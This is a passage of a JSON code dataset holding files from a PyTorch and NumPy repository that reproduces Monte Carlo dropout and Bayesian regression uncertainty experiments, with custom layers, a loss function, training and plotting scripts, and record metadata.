},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 18,
"blob_id": "cba2a5ee71fb5ece2ff21a4e4c607044e1642cfa",
"content_id": "2c572ff3ccede0ff24b678bdf42bc9118fc1485c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 1,
"path": "/firstpython.py",
"repo_name": "Mae317/Mae",
"src_encoding": "UTF-8",
"text": "#disp;ay the input\n\n"
}
] | 2 |
makora9143/bayes_uncertainty | https://github.com/makora9143/bayes_uncertainty | d0dd07263a43a82cbcf3f2007c297afa831d6447 | 1f651fda9dbbb9004fc9b83744fd954ed6ad73a4 | a4f8123afccdfc8c79179ab0b3fdf26ff30a9f72 | refs/heads/master | 2020-03-12T14:33:52.448986 | 2018-04-30T09:20:42 | 2018-04-30T09:20:42 | 130,670,349 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.603225827217102,
"alphanum_fraction": 0.6174193620681763,
"avg_line_length": 38.74359130859375,
"blob_id": "6440576eb34f0bc107e8bed2ef29e67a7910d735",
"content_id": "37191b22c27a6234eae0c7a1b318cd18d2dab944",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3100,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 78,
"path": "/mcdp/layers/linear.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function\n\nclass HeteroLinearFunction(Function):\n\n @staticmethod\n def forward(ctx, input, weight, bias=None):\n output = input.mm(weight.t())\n if bias is not None:\n output += bias.unsqueeze(0).expand_as(output)\n ctx.save_for_backward(input, weight, bias, output)\n return output\n\n @staticmethod\n def backward(ctx, grad_output):\n input, weight, bias, output = ctx.saved_tensors\n grad_input = grad_weight = grad_bias = None\n\n grad_output_mean = grad_output.index_select(1, torch.LongTensor([0]))\n prec = torch.exp(-output.index_select(1, torch.LongTensor([1])))\n weight_mean = weight.index_select(0, torch.LongTensor([0]))\n weight_sigma2 = weight.index_select(0, torch.LongTensor([1]))\n\n\n if ctx.needs_input_grad[0]:\n grad_input = (prec * grad_output_mean).mm(weight_mean)\n grad_input -= 0.5 * (prec * grad_output_mean ** 2 - 1).mm(weight_sigma2)\n if ctx.needs_input_grad[1]:\n grad_weight_mean = (prec * grad_output_mean).t().mm(input)\n grad_weight_sigma2 = - 0.5 * (prec * grad_output_mean ** 2).t().mm(input)\n grad_weight = torch.cat([grad_weight_mean, grad_weight_sigma2], 0)\n if bias is not None and ctx.needs_input_grad[2]:\n grad_bias_mean = (prec * grad_output_mean).sum(0)\n grad_bias_sigma2 = (- 0.5 * (prec * grad_output_mean ** 2 - 1)).sum(0)\n grad_bias = torch.cat([grad_bias_mean, grad_bias_sigma2])\n\n return grad_input, grad_weight, grad_bias\n\nclass HeteroLinear(nn.Module):\n def __init__(self, input_features, output_features, bias=True):\n super(HeteroLinear, self).__init__()\n self.input_features = input_features\n self.output_features = output_features\n\n self.weight = nn.Parameter(torch.Tensor(output_features, input_features))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(output_features))\n else:\n self.register_parameter('bias', None)\n\n self.weight.data.normal_(0., 1./input_features)\n if bias is not None:\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n # See the autograd section for explanation of what happens here.\n return HeteroLinearFunction.apply(input, self.weight, self.bias)\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. You can test\n # it by printing an object of this class.\n return 'in_features={}, out_features={}, bias={}'.format(\n self.input_features, self.output_features, self.bias is not None\n )\n\n\n\nclass GaussianLinear(nn.Linear):\n def __init__(self, in_features, out_features, l, bias=True):\n self.l = l\n super(GaussianLinear, self).__init__(in_features, out_features, bias=True)\n\n def reset_parameters(self):\n self.weight.data.normal_(0, 1./(self.l) ** 2)\n if self.bias is not None:\n self.bias.data.normal_(0, 1./(self.l) ** 2)\n"
},
{
"alpha_fraction": 0.5662996768951416,
"alphanum_fraction": 0.580181896686554,
"avg_line_length": 29.72058868408203,
"blob_id": "d57784e41e458c574a8ef341e236a8be65704bf2",
"content_id": "f2e2c1d31ba5834e9085002f05a8f0b7845b7d86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2089,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/mcdp/layers/dropout.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom torch.autograd.function import InplaceFunction\nfrom torch.nn.modules.dropout import _DropoutNd\n\n\nclass MCDropoutFunction(InplaceFunction):\n @staticmethod\n def _make_noise(input):\n return input.new().resize_as_(input)\n\n @staticmethod\n def symbolic(g, input, p=0.5, train=False, inplace=False):\n # See Note [Export inplace]\n r, _ = g.op(\"Dropout\", input, ratio_f=p, is_test_i=not train, outputs=2)\n return r\n\n @classmethod\n def forward(cls, ctx, input, p=0.5, train=False, inplace=False):\n if p < 0 or p > 1:\n raise ValueError(\"dropout probability has to be between 0 and 1, \"\n \"but got {}\".format(p))\n ctx.p = p\n ctx.train = train\n ctx.inplace = inplace\n\n if ctx.inplace:\n ctx.mark_dirty(input)\n output = input\n else:\n output = input.clone()\n\n if ctx.p == 0 or not ctx.train:\n noise = cls._make_noise(output.narrow(0, 0, 1))\n noise.bernoulli_(1 - ctx.p).div_(1 - ctx.p)\n noise.expand_as(output)\n output.mul_(noise)\n return output\n\n ctx.noise = cls._make_noise(input)\n if ctx.p == 1:\n ctx.noise.fill_(0)\n else:\n ctx.noise.bernoulli_(1 - ctx.p).div_(1 - ctx.p)\n ctx.noise = ctx.noise.expand_as(input)\n output.mul_(ctx.noise)\n\n return output\n\n @staticmethod\n def backward(ctx, grad_output):\n if ctx.p > 0 and ctx.train:\n return grad_output * ctx.noise, None, None, None\n else:\n return grad_output, None, None, None\n\n\ndef mc_dropout(input, p=0.5, training=False, inplace=False):\n return MCDropoutFunction.apply(input, p, training, inplace )\n\n\nclass MCDropout(_DropoutNd):\n def __init__(self, p=0.5, inplace=False, sampling=100):\n super(MCDropout, self).__init__(p=0.5, inplace=False)\n \n def forward(self, input):\n output = mc_dropout(input, self.p, self.training, self.inplace)\n return output\n"
},
{
"alpha_fraction": 0.5394946336746216,
"alphanum_fraction": 0.5565672516822815,
"avg_line_length": 33.3203125,
"blob_id": "fba3a1c55f3c3e4f6fc672798057a57bc9e20378",
"content_id": "eaf4f98f49d8b61bc1d9eed0b0721a32537a1f71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4393,
"license_type": "no_license",
"max_line_length": 285,
"num_lines": 128,
"path": "/gpr.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nimport argparse\n\n\n\ndef create_dataset(N, M, data_range=(-1, 7), func=np.sin):\n xs = np.random.uniform(*data_range, N)\n ys = func(xs)\n\n ys = ys + np.random.randn(*ys.shape)\n\n features = convert_features(xs, M)\n\n return xs, ys, features\n\n\ndef convert_features(xs, M):\n features = np.concatenate([\n np.power(xs.reshape(-1, 1), i) for i in range(M)\n ],\n axis=1)\n return features\n\n# def convert_features(xs, M, means, var):\n# return - np.power(xs.reshape(-1, 1) - means, 2) / (2 * np.power(var, 2))\n\n\ndef posterior(observed_xs, ys, prior_mean, prior_var, noise_var):\n dim = prior_var.shape[0]\n\n posterior_var = np.zeros((dim, dim))\n\n posterior_mean = np.zeros((1, dim))\n\n for x, y in zip(observed_xs, ys):\n x = x.reshape(1, -1)\n posterior_var += np.dot(x.T, x)\n posterior_mean += y * x\n\n posterior_var = noise_var * posterior_var + prior_var\n\n posterior_mean = np.dot(noise_var * posterior_mean + np.dot(prior_mean, prior_var),\n np.linalg.inv(posterior_var))\n\n return posterior_mean, posterior_var\n\n\ndef predictive(xs, mean, var, noise_var):\n dim = var.shape[0]\n features = convert_features(xs, dim)\n\n mean_star = np.dot(features, mean.T).reshape(-1)\n \n var_star = np.diag(np.dot(np.dot(features, np.linalg.inv(var)), features.T))\n\n std_star = np.sqrt(var_star)\n return mean_star, mean_star - std_star, mean_star + std_star\n\n\ndef evidence(ys, priors, posteriors, noise_var):\n print(\"yn\",noise_var * np.sum(np.power(ys, 2)))\n print(\"const\", - np.log(noise_var) + np.log(2 * np.pi))\n print(\"prior\", np.dot(np.dot(priors[0], priors[1]), priors[0].T) - np.log(np.linalg.det(priors[1])))\n print(\"post\", - np.dot(np.dot(posteriors[0], posteriors[1]), posteriors[0].T))\n print(\"post_det\", + np.log(np.linalg.det(posteriors[1])))\n return -0.5 * (noise_var * np.sum(np.power(ys, 2)) - np.log(noise_var) + np.log(2 * np.pi) + np.dot(np.dot(priors[0], priors[1]), priors[0].T) - np.log(np.linalg.det(priors[1])) - np.dot(np.dot(posteriors[0], posteriors[1]), posteriors[0].T) + np.log(np.linalg.det(posteriors[1])))\n\n\ndef hoge(x):\n return 0.01 * np.power(x, 2) + np.sin(x)\n\n\ndef main(args):\n N = args.num_data\n M = args.dim\n noise_var = args.noise_var\n data_range = (-1, 7)\n func = np.sin\n\n all_x = np.linspace(data_range[0] - 3, data_range[1] + 3, 100)\n\n xs, ys, features = create_dataset(N, M, data_range, func)\n\n fig, ax = plt.subplots()\n artists = []\n posterior_mean = np.zeros((1, M))\n posterior_var = np.identity(M)\n\n for i in range(1, N + 1):\n posterior_mean, posterior_var = posterior(features[i-1:i], ys[i-1:i],\n posterior_mean, posterior_var,\n noise_var)\n mean_star, min_star, max_star = predictive(all_x,\n posterior_mean, posterior_var,\n noise_var) \n\n plt.ylim(-5, 20)\n plt.plot(all_x, func(all_x), 'r')\n b = plt.plot(xs[:i], ys[:i], 'ro')\n a = plt.plot(all_x, mean_star, 'b')\n c = plt.plot(all_x, min_star, 'c--')\n d = plt.plot(all_x, max_star, 'c--')\n # plt.fill_between(all_x, min_star, max_star, alpha=0.2)\n artists.append(a + b + c + d)\n\n ani = anime.ArtistAnimation(fig, artists, interval=500, repeat_delay=1000)\n posterior_mean, posterior_var = posterior(features, ys,\n np.zeros((1, M)), np.identity(M),\n noise_var)\n print(evidence(ys, (np.zeros((1, M)), np.identity(M)), (posterior_mean, posterior_var), noise_var))\n plt.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Bayesian Logistic Regression')\n parser.add_argument('--num_data', type=int, default=10,\n help='number of train data')\n parser.add_argument('--dim', type=int, default=5,\n help='dimension')\n parser.add_argument('--noise_var', type=float, default=10,\n help='noise variance')\n\n args = parser.parse_args()\n\n main(args)\n"
},
{
"alpha_fraction": 0.5545023679733276,
"alphanum_fraction": 0.5639810562133789,
"avg_line_length": 19.899999618530273,
"blob_id": "0b3ad2958fe635778c23daf2b9c85bb8703633f5",
"content_id": "f25a7f6d54a8cd264e2d9c031cde99f2a41de484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 10,
"path": "/mcdp/layers/misc.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch.nn as nn\n\n\nclass Flatten(nn.Module):\n def __init__(self):\n super(Flatten, self).__init__()\n\n def forward(self,x):\n batch_size = x.size(0)\n return x.view(batch_size, -1)\n\n\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7647058963775635,
"avg_line_length": 16,
"blob_id": "bb8992c0a9a362e92feffc91913adf1f890bada9",
"content_id": "39ec62108cc208d167084ba36b1f4586b2ba3e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 1,
"path": "/README.md",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "# Yarin Galの博論再現\n"
},
{
"alpha_fraction": 0.6499595642089844,
"alphanum_fraction": 0.6531932353973389,
"avg_line_length": 36.45454406738281,
"blob_id": "644ba63e14fa9831a7e96aa9e88f62bf644840d6",
"content_id": "9afaf2ba9c243f3e04585e1cf17490c5f11d2431",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 33,
"path": "/mcdp/loss.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import math\nimport torch\n\nfrom torch.nn.modules.loss import _Loss\n\n\ndef _assert_no_grad(tensor):\n assert not tensor.requires_grad, \\\n \"nn criterions don't compute the gradient w.r.t. targets - please \" \\\n \"mark these tensors as not requiring gradients\"\n\ndef gnll_loss(input, target, prec, size_average=True, reduce=True):\n return _pointwise_loss(lambda a, b, c: 0.5 * (math.log(2 * math.pi) - torch.log(c) + c * (a - b) ** 2), torch._C._nn.mse_loss,\n input, target, prec, size_average, reduce)\n\n\ndef _pointwise_loss(lambd, lambd_optimized, input, target, prec, size_average=True, reduce=True):\n if target.requires_grad:\n d = lambd(input, target, prec)\n if not reduce:\n return d\n return torch.mean(d) if size_average else torch.sum(d)\n else:\n return lambd_optimized(input, target, size_average, reduce)\n\n\nclass HeteroGaussianNLLLoss(_Loss):\n def __init__(self, size_average=True, reduce=True):\n super(HeteroGaussianNLLLoss, self).__init__(size_average, reduce)\n\n def forward(self, input, target, prec):\n _assert_no_grad(target)\n return gnll_loss(input, target, prec, size_average=self.size_average, reduce=self.reduce)\n\n"
},
{
"alpha_fraction": 0.6069997549057007,
"alphanum_fraction": 0.6195564866065979,
"avg_line_length": 33.33945083618164,
"blob_id": "009df8c41dcdfdf01442467fb5758cf510c19fb3",
"content_id": "8a711da879f621cb0c1e3ea27c851de6dd4e6f4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3743,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 109,
"path": "/homo_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nfrom tqdm import tqdm\n\nfrom mcdp.models import MCDropoutReg\nfrom mcdp.dataset import PointDataset\n\n\ndef train_epoch(model, creterion, dataloader, optimizer):\n model.predict()\n losses = 0\n for x, y in dataloader:\n optimizer.zero_grad()\n x, y = Variable(x), Variable(y)\n mean = model(x)\n loss = creterion(mean, y)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n return losses / len(dataloader)\n\ndef test(model, creterion, dataloader):\n model.mc()\n x, y = iter(dataloader).next()\n x, y = Variable(x), Variable(y)\n predict, var, result = model(x)\n loss = creterion(predict, y)\n return predict, var, result, loss.data.item()\n\n\ndef xsin(x):\n return x * torch.sin(x)\n\ndef main(args):\n\n train_dataset = PointDataset(args.N, low=-5, high=5, function=xsin)\n trainloader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n\n test_dataset = PointDataset(low=-7, high=7, function=xsin)\n testloader = data.DataLoader(test_dataset, batch_size=len(test_dataset), shuffle=False)\n \n model = MCDropoutReg(args.drop_p, args.units, args.sampling)\n print(model)\n\n optimizer = optim.Adam(model.parameters(), weight_decay=args.lam)\n\n creterion = nn.MSELoss()\n\n artists = []\n fig, ax = plt.subplots()\n a = ax.plot(test_dataset.xs.numpy(), test_dataset.ys.numpy(), 'r')\n b = ax.plot(train_dataset.xs.numpy(), train_dataset.ys.numpy(), 'bo')\n\n \n pbar = tqdm(range(1, args.epochs + 1))\n\n for epoch in pbar:\n train_loss = train_epoch(model, creterion, trainloader, optimizer)\n mean, var, result, test_loss = test(model, creterion, testloader)\n std = torch.sqrt(var) + 2 * args.N * args.lam / (1 - args.drop_p) / 0.005\n c = ax.plot(test_dataset.xs.numpy(), mean.data.numpy(), 'b')\n d = ax.plot(test_dataset.xs.numpy(), (mean - std).data.numpy(), 'c--')\n e = ax.plot(test_dataset.xs.numpy(), (mean + std).data.numpy(), 'c--')\n f = ax.plot(test_dataset.xs.numpy(), result[0].data.numpy(), 'gray')\n # g = ax.fill_between(test_dataset.xs.numpy(),(mean - std).data.numpy().reshape(-1) , (mean + std).data.numpy().reshape(-1))\n\n artists.append(a + b + c + d + e + f )\n pbar.set_description('Epoch{}'.format(epoch))\n pbar.set_postfix(train=train_loss, test=test_loss)\n\n\n animation = anime.ArtistAnimation(fig, artists, interval=100, repeat_delay=1500)\n plt.show()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='ArgParser')\n\n parser.add_argument('--sampling', type=int, default=100,\n help='Number of sampling')\n parser.add_argument('--N', type=int, default=20,\n help='Number of data')\n parser.add_argument('--units', type=int, default=20,\n help='Number of hidden units')\n parser.add_argument('--lr', type=float, default=0.01,\n help='Learning rate')\n parser.add_argument('--batch_size', type=int, default=10,\n help='Batch size')\n parser.add_argument('--epochs', type=int, default=20,\n help='Epoch')\n parser.add_argument('--lam', type=float, default=0.00001,\n help='weight for L2 norm')\n parser.add_argument('--drop_p', type=float, default=0.05,\n help='dropout probability')\n\n args = parser.parse_args()\n main(args)\n"
},
{
"alpha_fraction": 0.5889337658882141,
"alphanum_fraction": 0.6072191596031189,
"avg_line_length": 32.959678649902344,
"blob_id": "2e50cfb767e09cbd7b16b7d3e15bbb82120845f9",
"content_id": "f421085c2e803f346463b3f4c47114b938b7cdaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4211,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 124,
"path": "/hetero_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nfrom tqdm import tqdm\n\nfrom mcdp.models import HeteroMCDropoutReg\nfrom mcdp.dataset import PointDataset\nfrom mcdp.loss import HeteroGaussianNLLLoss\n\ndevice = 'cpu'\n\ndef train_epoch(model, creterion, dataloader, optimizer):\n global device\n model.predict()\n losses = 0\n for x, y in dataloader:\n optimizer.zero_grad()\n x, y = x.to(device), y.to(device)\n mean, sigma2 = model(x)\n loss = creterion(mean, y, 1./sigma2)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n return losses / len(dataloader) / dataloader.batch_size\n\ndef test(model, dataloader):\n with torch.autograd.no_grad():\n model.mc()\n x, y = iter(dataloader).next()\n mean, var = model(x)\n return mean, torch.sqrt(var)\n\ndef xsin(x):\n return x * torch.sin(x)\n\ndef main(args):\n func = xsin\n\n train_dataset = PointDataset(args.N, function=func)\n trainloader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False)\n\n test_dataset = PointDataset(low=-12, high=12, function=func)\n testloader = data.DataLoader(test_dataset, batch_size=len(test_dataset), shuffle=False)\n \n model = HeteroMCDropoutReg(args.drop_p, args.units, args.sampling)\n print(model)\n\n l2_decay = args.l2 * (1 - args.drop_p) / (2 * args.N)\n print('L2_decay =', l2_decay)\n\n optimizer = optim.SGD(model.parameters(), lr=0.001, weight_decay=l2_decay)\n # optimizer = optim.Adam(model.parameters(), weight_decay=l2_decay)\n\n # creterion = nn.MSELoss()\n creterion = HeteroGaussianNLLLoss()\n\n artists = []\n fig, ax = plt.subplots()\n ax.set_ylim(-10, 10)\n b = ax.plot(train_dataset.xs.numpy(), train_dataset.ys.numpy(), 'o', color='black')\n \n pbar = tqdm(range(1, args.epochs + 1))\n colors = ['steelblue', 'deepskyblue', 'lightskyblue', 'aliceblue']\n\n for epoch in pbar:\n train_loss = train_epoch(model, creterion, trainloader, optimizer)\n mean, std = test(model, testloader)\n\n c = ax.plot(test_dataset.xs.numpy(), mean.data.numpy(), 'b', linewidth=1.5)\n for i in range(0, 3):\n c += ax.plot(test_dataset.xs.numpy(),\n (mean - 2 * std * (i+1)/4).data.numpy(),\n '--', color=colors[i], linewidth=0.5)\n c += ax.plot(test_dataset.xs.numpy(),\n (mean + 2 * std * (i+1)/4).data.numpy(),\n '--', color=colors[i], linewidth=0.5)\n\n artists.append(b + c)\n pbar.set_description('Epoch {}'.format(epoch))\n pbar.set_postfix(train=train_loss)\n\n\n animation = anime.ArtistAnimation(fig, artists, interval=100, repeat_delay=1500)\n # animation.save('certainity_regression.gif', writer='imagemagick', fps=100)\n plt.show()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='ArgParser')\n\n parser.add_argument('--sampling', type=int, default=100,\n help='Number of sampling')\n parser.add_argument('--N', type=int, default=20,\n help='Number of data')\n parser.add_argument('--units', type=int, default=20,\n help='Number of hidden units')\n parser.add_argument('--lr', type=float, default=0.01,\n help='Learning rate')\n parser.add_argument('--batch_size', type=int, default=10,\n help='Batch size')\n parser.add_argument('--epochs', type=int, default=20,\n help='Epoch')\n parser.add_argument('--lam', type=float, default=0.00001,\n help='weight for L2 norm')\n parser.add_argument('--drop_p', type=float, default=0.05,\n help='dropout probability')\n parser.add_argument('--l2', type=float, default=0.1,\n help='data length frequency')\n\n args = parser.parse_args()\n global device\n device = torch.device('cpu')\n main(args)\n"
},
{
"alpha_fraction": 0.47209876775741577,
"alphanum_fraction": 0.4995061755180359,
"avg_line_length": 25.457515716552734,
"blob_id": "d238e7363a260e1e86b782796ce75df5eb09263a",
"content_id": "1e6a6df9a61fe76c8d17e6d4e181ea47f2dc3e45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 153,
"path": "/mcdp/models.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\n\nimport torch\nimport torch.nn as nn\n\nfrom .layers.linear import HeteroLinear\nfrom .layers.misc import Flatten\nfrom .layers.dropout import MCDropout\n\nclass MCDropoutReg(nn.Module):\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(MCDropoutReg, self).__init__()\n self.net = nn.Sequential(\n\n # nn.Dropout(0.05),\n nn.Linear(1, hidden),\n nn.ReLU(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, hidden),\n nn.Sigmoid(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, 1)\n )\n \n self.sampling = sampling\n self.mc_flg = False\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n mean = torch.mean(result, 0)\n var = torch.mean(torch.pow(result, 2), 0) - torch.pow(mean, 2)\n return mean, var, result\n else:\n return self.net(x)\n\n def mc(self):\n self.mc_flg = True\n return self\n\n def predict(self):\n self.mc_flg = False\n return self\n\n def mc_forward(self, x):\n xs = itertools.repeat(x, self.sampling)\n result = torch.stack(list(map(self.net, xs)))\n return result\n\n\n\nclass HeteroMCDropoutReg(MCDropoutReg):\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(HeteroMCDropoutReg, self).__init__(drop_p=0.1, hidden=20, sampling=100)\n self.net = nn.Sequential(\n # nn.Dropout(0.05),\n nn.Linear(1, hidden),\n nn.ReLU(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, hidden),\n nn.Sigmoid(),\n\n nn.Dropout(drop_p),\n # nn.Linear(hidden, 2)\n HeteroLinear(hidden, 2),\n )\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n mc_mean, mc_sigma2 = self.separate(result)\n\n mean = torch.mean(mc_mean, 0)\n var = self.variance(mc_mean, mc_sigma2)\n\n return mean, var\n else:\n result = self.net(x)\n mean, sigma2 = self.separate(result)\n return mean, sigma2\n\n def separate(self, x):\n mean = x.index_select(-1, torch.LongTensor([0]))\n sigma2 = torch.exp(x.index_select(-1, torch.LongTensor([1])))\n return mean, sigma2\n\n\n def variance(self, mc_mean, mc_sigma2):\n exp_mean = torch.mean(mc_mean, 0)\n exp_sigma2 = torch.mean(mc_sigma2, 0)\n var = torch.mean(torch.pow(mc_mean, 2), 0) - torch.pow(exp_mean, 2) + exp_sigma2\n return var\n\n\nclass MCLeNet(MCDropoutReg):\n\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(MCLeNet, self).__init__(drop_p=0.1, hidden=20, sampling=100)\n\n self.net = nn.Sequential(\n nn.Conv2d(1, 20, 5, 1),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n\n nn.Conv2d(20, 50, 5, 1),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n\n Flatten(),\n \n nn.Linear(50* 4 * 4, 500),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(500, 10),\n nn.LogSoftmax(-1)\n )\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n else:\n result = self.net(x)\n return result\n\n\nclass BNNet(nn.Module):\n def __init__(self, p=0.5, l=1, L=4, hidden=10):\n super(Net, self).__init__()\n\n self.net = nn.ModuleList()\n \n self.net.append(nn.Sequential(\n PriorLinear(1, hidden, l),\n nn.ReLU(),\n MCDropout(p),\n )\n )\n\n for i in range(L-1):\n tmp = nn.Sequential(\n PriorLinear(hidden, hidden, l),\n nn.ReLU(),\n MCDropout(p)\n )\n self.net.append(tmp)\n\n self.net.append(PriorLinear(hidden, 1, l))\n\n def forward(self, x):\n return self.net(x)\n\n\n"
},
{
"alpha_fraction": 0.7464212775230408,
"alphanum_fraction": 0.7791411280632019,
"avg_line_length": 47.900001525878906,
"blob_id": "af28524c3bb982cb97701d8ea6ca2ddfebfad3d2",
"content_id": "0b06e275e7516b882443c410067ae70dd4662e98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 489,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 10,
"path": "/grad_test.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import gradcheck\nfrom mcdp.heterolayer import HeteroLinearFunction, LinearFunction\n\ninput = (Variable(torch.randn(60,20).double(), requires_grad=True), Variable(torch.randn(2,20).double(), requires_grad=True),Variable(torch.randn(2,).double(), requires_grad=True))\n# test = gradcheck(LinearFunction.apply, input, eps=1e-6, atol=1e-4)\ntest = gradcheck(HeteroLinearFunction.apply, input, eps=1e-6, atol=1e-4)\n\nprint(test)\n"
},
{
"alpha_fraction": 0.49167823791503906,
"alphanum_fraction": 0.5367544889450073,
"avg_line_length": 21.184616088867188,
"blob_id": "d7809ee324107691a0ab02ba1173ef2f26d52548",
"content_id": "9783be5356c6e6fb8ee8c5cce3c81a131ee7febb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1442,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 65,
"path": "/bnn_sample.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom mcdp.layers.dropout import MCDropout\nfrom mcdp.layers.linear import GaussianLinear\n\nimport matplotlib.pyplot as plt\n\n\nparams = {\n \"ReLU\": [[1, 10], [32, 512, 4096]],\n \"Tanh\": [[1, 10], [32, 512, 4096]],\n \"Sigmoid\": [[0.1, 1], [32, 512, 4096]]\n}\n\nactivations = {\n \"ReLU\": nn.ReLU,\n \"Tanh\": nn.Tanh,\n \"Sigmoid\": nn.Sigmoid\n}\n\n\ndef plot(l, k, func, idx):\n activation = activations[func]\n\n drop = nn.Sequential(\n GaussianLinear(1, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, 1, l)\n )\n\n x = torch.linspace(-2, 2, 100).view(-1, 1)\n\n drop.eval()\n tmp = []\n for i in range(20):\n y = drop(x)\n tmp.append(y)\n plt.subplot(6, 3, idx)\n plt.plot(x.detach().numpy(), y.detach().numpy(), 'c', linewidth=0.3)\n plt.title('{}, l:{}, k:{}'.format(func, l, k))\n y_mean = torch.mean(torch.cat(tmp, 1), 1).view(-1, 1)\n plt.plot(x.detach().numpy(), y_mean.detach().numpy(), 'b', linewidth=1.0)\n\nplt.subplots_adjust(wspace=0.4, hspace=0.6)\n\nfor i, (activation, params) in enumerate(params.items(), 1):\n ls, ks = params\n j = 0\n for k in ks:\n for l in ls:\n plot(l, k, activation, i + (3 * j))\n\n j += 1\n\n\n\n\nplt.show()\n"
},
{
"alpha_fraction": 0.534983217716217,
"alphanum_fraction": 0.56981360912323,
"avg_line_length": 29.27777862548828,
"blob_id": "2d6899aa1de6219b965945c7933ad8012b7c7106",
"content_id": "8f389e55fff7c01c92c997923811122024bb3ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3273,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 108,
"path": "/bnn_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
